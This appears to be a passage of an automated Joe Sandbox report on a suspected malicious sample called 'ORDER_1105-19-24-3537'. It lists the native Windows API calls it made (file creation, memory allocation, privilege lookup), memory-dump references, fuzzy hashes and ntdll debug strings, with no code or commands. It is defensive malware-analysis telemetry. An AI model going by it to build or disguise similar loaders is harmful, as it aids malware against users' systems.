                                • Instruction Fuzzy Hash: 11F0F8B6200148AFCB14DF89DC80EEB7BA9AF88354F158149FA5D97242C630E911CBB4

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 237 41a34a-41a34b 238 41a34d-41a34e 237->238 239 41a36e-41a3a1 NtCreateFile 237->239 238->239
                                APIs
                                • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                                Memory Dump Source
                                • Source File: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_ORDER_1105-19-24-3537.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                • API String ID: 823142352-0
                                • Opcode ID: 72938932b16b44c2ae16e7d63586980b453333b2797915cc557ce602824b82a9
                                • Instruction ID: f5fc7ddbb5e86f402bbff2efb70227236035e06a620103808ba235a4a8e6223b
                                • Opcode Fuzzy Hash: 72938932b16b44c2ae16e7d63586980b453333b2797915cc557ce602824b82a9
                                • Instruction Fuzzy Hash: 29F0A5B2204508AB8B08CFA8D980DEB77EEAB8C314725864CFA5DD7204C634E8528B64

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 240 41a530-41a546 241 41a54c-41a56d NtAllocateVirtualMemory 240->241 242 41a547 call 41af50 240->242 242->241
                                APIs
                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569
                                Memory Dump Source
                                • Source File: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_ORDER_1105-19-24-3537.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateMemoryVirtual
                                • String ID:
                                • API String ID: 2167126740-0
                                • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                • Instruction ID: 4e0f78fd3c2c10b6dba7ecb12144fed22081eaa1fb7babd41561f41a61d0d9a2
                                • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                • Instruction Fuzzy Hash: A3F015B2200208AFCB14DF89CC81EEB77ADAF88754F118149BE1C97241C630F811CBA4

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 255 41a480-41a4a9 call 41af50 NtClose
                                APIs
                                • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                Memory Dump Source
                                • Source File: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_ORDER_1105-19-24-3537.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close
                                • String ID:
                                • API String ID: 3535843008-0
                                • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                • Instruction ID: 58703de6d0d09b45194c1a78dafb6a6614d70e6a8447524affba2eb7b0ba4c9c
                                • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                • Instruction Fuzzy Hash: E9D01776200214ABD710EB99CC85EE77BACEF48764F154499BA1C9B242C530FA1086E4
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 8a2e7e64036b59a2465e4c7ee0ea99f8fecabc2bee7d13a3fa11560797e9bfb7
                                • Instruction ID: 01dda8826b5a7a105dd8d46dcc220c820ef534b7643bc5fcae3cb943bea3f17b
                                • Opcode Fuzzy Hash: 8a2e7e64036b59a2465e4c7ee0ea99f8fecabc2bee7d13a3fa11560797e9bfb7
                                • Instruction Fuzzy Hash: CE90026160240403460971584514616400A97E1201B55C021E1119590DC62989916229
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: f676adcd1fe981212841d48a1039df75942bd298f3fab61067c64a18f7fd18bd
                                • Instruction ID: bc8b1d31415c270d062fecd43da47f3ceaba6493430fe8c5a9cf4da25841cea9
                                • Opcode Fuzzy Hash: f676adcd1fe981212841d48a1039df75942bd298f3fab61067c64a18f7fd18bd
                                • Instruction Fuzzy Hash: 9C90023160140C02D6847158450464A000597D2301F95C015A012A654DCB198B5977A5
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: c60316cfdb0dba16e5e356d65ada04ce5ab40c31d6975e939bcbe5f61f27c14e
                                • Instruction ID: e158bec955d9ffeb5cde8fba6b17e085d8bd2b05d00d5ae4d47a31d98527bc9e
                                • Opcode Fuzzy Hash: c60316cfdb0dba16e5e356d65ada04ce5ab40c31d6975e939bcbe5f61f27c14e
                                • Instruction Fuzzy Hash: 4290043571140403070DF55C07045070047D7D7351355C031F111F550CD735CD715335
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: bb2ec34d173cf1ca56ac8c63b0e408801b040a45466e8dbd854b0dc241e82cb5
                                • Instruction ID: 370906c9048ad11ccbe7420747490d2bea18d30c22147759ccfa6b7d72e45815
                                • Opcode Fuzzy Hash: bb2ec34d173cf1ca56ac8c63b0e408801b040a45466e8dbd854b0dc241e82cb5
                                • Instruction Fuzzy Hash: 0A90022961340402D6847158550860A000597D2202F95D415A011A558CCA1989695325
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 9732fc6dd5f36e578f73cef31012c52a55cf542686bfd5d9a5215b53a49d158f
                                • Instruction ID: c75c481db7fe565689b7cac14c99a51aaa6dbd3ec15640884cbd66436cfb0ffb
                                • Opcode Fuzzy Hash: 9732fc6dd5f36e578f73cef31012c52a55cf542686bfd5d9a5215b53a49d158f
                                • Instruction Fuzzy Hash: F790022170140403D644715855186064005E7E2301F55D011E0519554CDA1989565326
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: ce7deca891ca6605d058b048600df5f141254dd76af93c85f40a4adca1720021
                                • Instruction ID: 94f769341c5831d9a3811a80abb5c2a9601c4d6a61f1eaef06bf416dee4396f4
                                • Opcode Fuzzy Hash: ce7deca891ca6605d058b048600df5f141254dd76af93c85f40a4adca1720021
                                • Instruction Fuzzy Hash: A8900221642445525A49B15845045074006A7E1241795C012A1519950CC62A9956D725
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 64219fee77333a259f408d763f81a0787eccba63899a90f91f6c0b869c75a0c2
                                • Instruction ID: c0c5458101673816b02ba26aa5e1acba579bbf911d0bf756699f354be363f8c4
                                • Opcode Fuzzy Hash: 64219fee77333a259f408d763f81a0787eccba63899a90f91f6c0b869c75a0c2
                                • Instruction Fuzzy Hash: C790023160140813D61571584604707000997D1241F95C412A0529558DD75A8A52A225
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 4a2f198333afbaac0c0dd9239819dcd55ad63414a4a78a3e43f1e4f4d2194b14
                                • Instruction ID: 30689f61dd810cf3603ead9ca9d9ed3fd1d02fd747140383557d48c4b58b9aa8
                                • Opcode Fuzzy Hash: 4a2f198333afbaac0c0dd9239819dcd55ad63414a4a78a3e43f1e4f4d2194b14
                                • Instruction Fuzzy Hash: 1290023160148C02D6147158850474A000597D1301F59C411A4529658DC79989917225
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: fb240bde9ed90e96c9dc7c012e9d834eedda635790144a2134d35ba761e3bee7
                                • Instruction ID: 518b6a0ee20492b08b29681ac14940f96db0b4d9d48e427d934c02ae50a52979
                                • Opcode Fuzzy Hash: fb240bde9ed90e96c9dc7c012e9d834eedda635790144a2134d35ba761e3bee7
                                • Instruction Fuzzy Hash: 0890023160140802D60475985508646000597E1301F55D011A5129555EC76989916235
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 6ee4f93be9e47da0dc2491d946e756ac87a346bad430156dc8552c464ab61896
                                • Instruction ID: e1216458d1a49d6a927dcee3e75171f97e8e3b3de3ed3e025c820326db46f133
                                • Opcode Fuzzy Hash: 6ee4f93be9e47da0dc2491d946e756ac87a346bad430156dc8552c464ab61896
                                • Instruction Fuzzy Hash: AA90026174140842D60471584514B060005D7E2301F55C015E1169554DC71DCD52622A
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: e6286749a96113080ab40f3d8fccbecd4412f40ad2075fd48cf0b34c5848c49c
                                • Instruction ID: dd4a540615650f48a55dc8989d45d27bb0b6881ee37e244c25f19aa10c90a4cf
                                • Opcode Fuzzy Hash: e6286749a96113080ab40f3d8fccbecd4412f40ad2075fd48cf0b34c5848c49c
                                • Instruction Fuzzy Hash: 4F90023160180802D6047158491470B000597D1302F55C011A1269555DC72989516675
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 17b067ebfc1ff0c82ee1f2fd4a96d59f5421bd96f715f8de755b2750e1ee5856
                                • Instruction ID: 69d8a2ffdeaa1bcb67944dc896138187a1fd1b0737d862991da3817e3b0f479e
                                • Opcode Fuzzy Hash: 17b067ebfc1ff0c82ee1f2fd4a96d59f5421bd96f715f8de755b2750e1ee5856
                                • Instruction Fuzzy Hash: 15900221A01404424644716889449064005BBE2211755C121A0A9D550DC65D89655769
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 9ccf6820bc791eb4c19c81bf9358e0676ad81e70115f80128b5a85eb4300ad61
                                • Instruction ID: e867fbb3a4a5184c96a89b2cdc994db672448cc562f692af3603871d06bbc21e
                                • Opcode Fuzzy Hash: 9ccf6820bc791eb4c19c81bf9358e0676ad81e70115f80128b5a85eb4300ad61
                                • Instruction Fuzzy Hash: 3C900221611C0442D70475684D14B07000597D1303F55C115A0259554CCA1989615625
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: b4a041419d6dce3baec6977bb455e7038ea9f85dabc5c6c71c7d32e66c83b21b
                                • Instruction ID: cb651da98e07eedd0241bfcb490bcdbe35d84f9f85b864cf347515f5da31ca76
                                • Opcode Fuzzy Hash: b4a041419d6dce3baec6977bb455e7038ea9f85dabc5c6c71c7d32e66c83b21b
                                • Instruction Fuzzy Hash: AB900221A0140902D60571584504616000A97D1241F95C022A1129555ECB298A92A235
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 73713b93f95b1d5f9e70dfe3d2a43096999e9499caadf2496a8663356c6d257f
                                • Instruction ID: 47f17c1ae86bb56e47403ad48151dfc03b7700efff5da5f23c8d3d21bfc1b801
                                • Opcode Fuzzy Hash: 73713b93f95b1d5f9e70dfe3d2a43096999e9499caadf2496a8663356c6d257f
                                • Instruction Fuzzy Hash: 6290027160140802D64471584504746000597D1301F55C011A5169554EC75D8ED56769
                                Memory Dump Source
                                • Source File: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_ORDER_1105-19-24-3537.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                                • Instruction ID: 290ea537485be02d779a264d5a339eceb4dab98af215cfaa17b5abd8430697b8
                                • Opcode Fuzzy Hash: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                                • Instruction Fuzzy Hash: FD213AB2D442095BCB21D664AD42BFF73BCAB54314F04007FE949A3182F638BF498BA5

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 3 41a620-41a651 call 41af50 RtlAllocateHeap
                                APIs
                                • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_ORDER_1105-19-24-3537.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap
                                • String ID: &EA
                                • API String ID: 1279760036-1330915590
                                • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                • Instruction ID: 51260f1f489a67c7b9949974b81657d9e18ee3442a924465d5a53260c52aa3af
                                • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                • Instruction Fuzzy Hash: AFE012B1200208ABDB14EF99CC41EA777ACAF88664F118559BA1C5B242C630F9118AB4

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 201 408310-40835a call 41be50 call 41c9f0 call 40ace0 call 414e40 210 40835c-40836e PostThreadMessageW 201->210 211 40838e-408392 201->211 212 408370-40838a call 40a470 210->212 213 40838d 210->213 212->213 213->211
                                APIs
                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                Memory Dump Source
                                • Source File: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_ORDER_1105-19-24-3537.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessagePostThread
                                • String ID:
                                • API String ID: 1836367815-0
                                • Opcode ID: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                                • Instruction ID: d17f8cfce065c66642409dfa920775f821b8147089a61b374e72855f6ed3688e
                                • Opcode Fuzzy Hash: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                                • Instruction Fuzzy Hash: E0018471A8032877E720A6959C43FFE776C6B40F54F05412AFF04BA1C2E6A8690546EA

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 243 41a660-41a691 call 41af50 RtlFreeHeap
                                APIs
                                • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
                                Memory Dump Source
                                • Source File: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_ORDER_1105-19-24-3537.jbxd
                                Yara matches
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                • Instruction ID: bc8b067cd83da56cee666b5c28ce04d4f8bf1b8054c0557e0bc192b3240f86e0
                                • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                • Instruction Fuzzy Hash: DAE012B1200208ABDB18EF99CC49EA777ACAF88764F018559BA1C5B242C630E9108AB4

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 246 41a7c0-41a7f4 call 41af50 LookupPrivilegeValueW
                                APIs
                                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                Memory Dump Source
                                • Source File: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_ORDER_1105-19-24-3537.jbxd
                                Yara matches
                                Similarity
                                • API ID: LookupPrivilegeValue
                                • String ID:
                                • API String ID: 3899507212-0
                                • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                • Instruction ID: b271a6b6fd8fca1a6df64550df1cef4b538e167436523c48f1a9ef262b7a55b1
                                • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                • Instruction Fuzzy Hash: 4FE01AB12002086BDB10DF49CC85EE737ADAF88654F018155BA0C57241C934E8118BF5

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 249 41a695-41a6c8 call 41af50 ExitProcess
                                APIs
                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                                Memory Dump Source
                                • Source File: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_ORDER_1105-19-24-3537.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID:
                                • API String ID: 621844428-0
                                • Opcode ID: 7d8de46da5ff24f50a39854a1109f2a889bde5056767dc6e5793d2599a21100b
                                • Instruction ID: c686d1b8fd82a4a11197cdedf06904ed2bfbdc46836597b027c9db4489e56fe3
                                • Opcode Fuzzy Hash: 7d8de46da5ff24f50a39854a1109f2a889bde5056767dc6e5793d2599a21100b
                                • Instruction Fuzzy Hash: 2EE08C74A04A006FD224DF58CCC5FD73BA8EF48750F108569B91C9F242C130EA01C7A1

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 252 41a7bd-41a7d9 253 41a7df-41a7f4 LookupPrivilegeValueW 252->253 254 41a7da call 41af50 252->254 254->253
                                APIs
                                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                Memory Dump Source
                                • Source File: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_ORDER_1105-19-24-3537.jbxd
                                Yara matches
                                Similarity
                                • API ID: LookupPrivilegeValue
                                • String ID:
                                • API String ID: 3899507212-0
                                • Opcode ID: a0bc16bb9a03409eb938ab9b1934fb1e619be7de1190b583be6e4de6bc8595e4
                                • Instruction ID: 7c4d1ce38936d3535ba02667bc4c15915a27e729beac10556aceb4e6a0d2f433
                                • Opcode Fuzzy Hash: a0bc16bb9a03409eb938ab9b1934fb1e619be7de1190b583be6e4de6bc8595e4
                                • Instruction Fuzzy Hash: 86E0DFB52042506FCB20DF55DC81EEB3BA8EF44220F048599FC8C1B203C534E814CBB8
                                APIs
                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                                Memory Dump Source
                                • Source File: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_ORDER_1105-19-24-3537.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID:
                                • API String ID: 621844428-0
                                • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                • Instruction ID: 02052f1feec4c32fa888e0c2ff15824475a9bddcc7bd9f2d7c69f560d23a1846
                                • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                • Instruction Fuzzy Hash: CBD017726002187BD620EB99CC85FD777ACDF487A4F0180A9BA1C6B242C531BA108AE5
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 6be6f1172b680e587512639fdb1a1fc43343166a54fd6db2e6d505164294d7ae
                                • Instruction ID: e7f4d61e65c81b80bab9f237f4750aa9cc9bc76564ea464632f9ed30a0aefddf
                                • Opcode Fuzzy Hash: 6be6f1172b680e587512639fdb1a1fc43343166a54fd6db2e6d505164294d7ae
                                • Instruction Fuzzy Hash: FFB09B71D019C5C5DF16F7644708717790077D1701F25C061D2134645F473CC1D1E675
                                Strings
                                • The instruction at %p tried to %s , xrefs: 011F8F66
                                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 011F8DD3
                                • read from, xrefs: 011F8F5D, 011F8F62
                                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 011F8D8C
                                • Go determine why that thread has not released the critical section., xrefs: 011F8E75
                                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 011F8E4B
                                • The critical section is owned by thread %p., xrefs: 011F8E69
                                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 011F8DC4
                                • *** enter .cxr %p for the context, xrefs: 011F8FBD
                                • *** An Access Violation occurred in %ws:%s, xrefs: 011F8F3F
                                • The resource is owned shared by %d threads, xrefs: 011F8E2E
                                • a NULL pointer, xrefs: 011F8F90
                                • *** then kb to get the faulting stack, xrefs: 011F8FCC
                                • This failed because of error %Ix., xrefs: 011F8EF6
                                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 011F8DB5
                                • *** Inpage error in %ws:%s, xrefs: 011F8EC8
                                • write to, xrefs: 011F8F56
                                • *** enter .exr %p for the exception record, xrefs: 011F8FA1
                                • The resource is owned exclusively by thread %p, xrefs: 011F8E24
                                • an invalid address, %p, xrefs: 011F8F7F
                                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 011F8F26
                                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 011F8DA3
                                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 011F8FEF
                                • The instruction at %p referenced memory at %p., xrefs: 011F8EE2
                                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 011F8E86
                                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 011F8F2D
                                • *** Resource timeout (%p) in %ws:%s, xrefs: 011F8E02
                                • <unknown>, xrefs: 011F8D2E, 011F8D81, 011F8E00, 011F8E49, 011F8EC7, 011F8F3E
                                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 011F8E3F
                                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 011F8F34
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                • API String ID: 0-108210295
                                • Opcode ID: 1dc89f60afe5064bbde62b4cf9dc098ebc0666a79390e2ad2d34da9334077482
                                • Instruction ID: bb062c808f4708d702a512a95d07a1167ae05d2511297a9c2fff00910f706e66
                                • Opcode Fuzzy Hash: 1dc89f60afe5064bbde62b4cf9dc098ebc0666a79390e2ad2d34da9334077482
                                • Instruction Fuzzy Hash: 7F811579A40211BFDB2D9A19CC49E6B7F36EFA6B54F05004CF3086F156E3768502CA63
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
